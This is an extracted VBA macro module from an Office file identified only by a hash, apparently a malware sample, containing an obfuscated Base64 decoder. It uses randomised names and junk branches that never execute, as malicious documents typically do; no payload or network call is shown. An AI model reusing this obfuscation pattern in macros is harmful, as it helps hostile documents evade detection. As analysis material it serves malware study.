Filename     : ./macros/c8ea8c9532b14e21b37b98424b1ea82c7f112eec758db689653c610067b4647e
OLE stream   : Macros/VBA/ywJAra
VBA filename : ywJAra.bas
----------------------------------------
Attribute VB_Name = "ywJAra"
Private K6RIj       As Boolean
Private upNkMV(0 To 63)  As Byte
Private ZX59Zz(0 To 127) As Byte
Public Function Yd1wPTzmk(ByVal s As String) As String
If s = "" Then Yd1wPTzmk = "": Exit Function
Yd1wPTzmk = kztnX56L2(kFMnyUg5(s))
End Function
Public Function kFMnyUg5(ByVal s As String) As Byte()
If Not K6RIj Then Init
   Dim IBuf() As Byte: IBuf = oEayk(s)
   Dim ILen As Long: ILen = UBound(IBuf) + 1
   If ILen Mod 4 <> 0 Then Err.Raise vbObjectError, , "Length of Base64 encoded input string is not a multiple of 4."
   Do While ILen > 0
      If IBuf(ILen - 1) <> Asc("=") Then Exit Do
      ILen = ILen - 1
      Loop
   Dim OLen As Long: OLen = (ILen * 3) \ 4
   Dim rykYmSj() As Byte
   ReDim rykYmSj(0 To OLen - 1) As Byte
   Dim ip As Long
   Dim op As Long
   Do While ip < ILen
      Dim i0 As Byte: i0 = IBuf(ip): ip = ip + 1
      Dim i1 As Byte: i1 = IBuf(ip): ip = ip + 1
      Dim i2 As Byte: If ip < ILen Then i2 = IBuf(ip): ip = ip + 1 Else i2 = Asc("A")
      Dim i3 As Byte: If ip < ILen Then i3 = IBuf(ip): ip = ip + 1 Else i3 = Asc("A")
      If i0 > 127 Or i1 > 127 Or i2 > 127 Or i3 > 127 Then Err.Raise vbObjectError, , "Illegal character in Base64 encoded data."
      Dim b0 As Byte: b0 = ZX59Zz(i0)
      Dim b1 As Byte: b1 = ZX59Zz(i1)
      Dim b2 As Byte: b2 = ZX59Zz(i2)
      Dim b3 As Byte: b3 = ZX59Zz(i3)
      If b0 > 63 Or b1 > 63 Or b2 > 63 Or b3 > 63 Then _
         Err.Raise vbObjectError, , "Illegal character in Base64 encoded data."
      Dim o0 As Byte: o0 = (b0 * 4) Or (b1 \ &H10)
      Dim o1 As Byte: o1 = ((b1 And &HF) * &H10) Or (b2 \ 4)
      Dim o2 As Byte: o2 = ((b2 And 3) * &H40) Or b3
      rykYmSj(op) = o0: op = op + 1
      If op < OLen Then rykYmSj(op) = o1: op = op + 1
      If op < OLen Then rykYmSj(op) = o2: op = op + 1
      Loop
   kFMnyUg5 = rykYmSj
   End Function
Private Sub Init()
   Dim c As Integer, i As Integer
   If 54 < 163 Then
' Xw9HaZPF
Else
' vc8BiTbkV
MsgBox "dynoj7P1z"
End If
   i = 0
   For c = Asc("A") To Asc("Z"): upNkMV(i) = c: i = i + 1: Next
   For c = Asc("a") To Asc("z"): upNkMV(i) = c: i = i + 1: Next
   For c = Asc("0") To Asc("9"): upNkMV(i) = c: i = i + 1: Next
   upNkMV(i) = Asc("+"): i = i + 1
   upNkMV(i) = Asc("/"): i = i + 1
   If 57 < 244 Then
' oKb7l
Else
' iXGMhL
MsgBox "n7LfzUN"
End If
If 49 < 134 Then
' Yeg6f
Else
' CVNAj3d
MsgBox "ftz3Jfwi"
End If
   For i = 0 To 127: ZX59Zz(i) = 255: Next
   For i = 0 To 63: ZX59Zz(upNkMV(i)) = i: Next
   K6RIj = True
   End Sub
Private Function oEayk(ByVal s As String) As Byte()
   Dim b1() As Byte: b1 = s
   Dim l As Long: l = (UBound(b1) + 1) \ 2
   If l = 0 Then oEayk = b1: Exit Function
   Dim b2() As Byte
   ReDim b2(0 To l - 1) As Byte
   Dim p As Long
   For p = 0 To l - 1
      Dim c As Long: c = b1(2 * p) + 256 * CLng(b1(2 * p + 1))
      If c >= 256 Then c = Asc("?")
      b2(p) = c
      Next
   oEayk = b2
   End Function
Private Function kztnX56L2(b() As Byte) As String
   Dim l As Long: l = UBound(b) - LBound(b) + 1
   Dim b2() As Byte
   ReDim b2(0 To (2 * l) - 1) As Byte
   Dim p0 As Long: p0 = LBound(b)
   Dim p As Long
   For p = 0 To l - 1: b2(2 * p) = b(p0 + p): Next
   Dim s As String: s = b2
   kztnX56L2 = s
   End Function
